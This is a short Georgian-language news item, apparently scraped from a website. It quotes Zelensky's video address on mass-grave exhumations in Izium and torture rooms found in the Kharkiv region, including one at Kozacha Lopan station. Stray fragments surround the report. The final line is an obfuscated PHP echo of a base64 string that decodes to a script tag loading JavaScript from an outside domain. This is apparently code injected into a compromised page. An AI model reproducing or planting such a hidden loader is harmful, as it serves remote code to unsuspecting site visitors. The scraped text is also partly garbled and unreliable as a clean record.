celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი, ვოლოდიმირ ზელენსკი მორიგ ვიდეომიმართვას ავრცელებს და ამბობს, რომ ხარკოვისა და იზიუმის ოლქში მასობრივი საფლავების ადგილზე ექსჰუმაციის სამუშოები გრძელდება, აღმოჩენილია ახალი მტკიცებულებები, წამების ოთახები და მოწყობილობები, მათ შორის კოზაჩა ლოპანის რკინიგზის სადგურზე. 
 
"ექსჰუმაციის სამუშაოები დღეს ხარკოვის ოლქში, იზიუმში, მასობრივი საფლავების ადგილზე გაგრძელდა, ცხედრებს ექსპერტიზა უტარდება. ნაპოვნია იქ დაკრძალული ადამიანების წამების ახალი მტკიცებულებები.  ხარკოვის ოლქის გათავისუფლებულ რაიონებში - სხვადასხვა ქალაქებსა და დაბებში უკვე ნაპოვნია ათზე მეტი წამების ოთახი. ოკუპანტებმა გაქცევისას წამების მოწყობილობებიც დატოვეს. კოზაჩა ლოპანის ჩვეულებრივ რკინიგზის სადგურზეც კი იპოვეს წამების ოთახი და ელექტრო წამების იარაღები. ეს უბრალოდ რკინიგზის სადგურია! ოკუპირებულ ტერიტორიაზე წამება ფართოდ გავრცელებული პრაქტიკა იყო. ასე მოიქცნენ ნაცისტები, ამას აკეთებენ რუსები. ისინიც ერთნაირად გიპასუხებენ - ბრძოლის ველზეც და სასამართლო დარბაზებშიც. ჩვენ გამოვავლენთ ყველას, ვინც აწამა, ვინც დაამცირა, ვინც რუსეთიდან აქ, ჩვენს უკრაინულ მიწაზე ჩამოიტანა ეს სისასტიკე" - ამბობს ზელენსკი
 
429
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");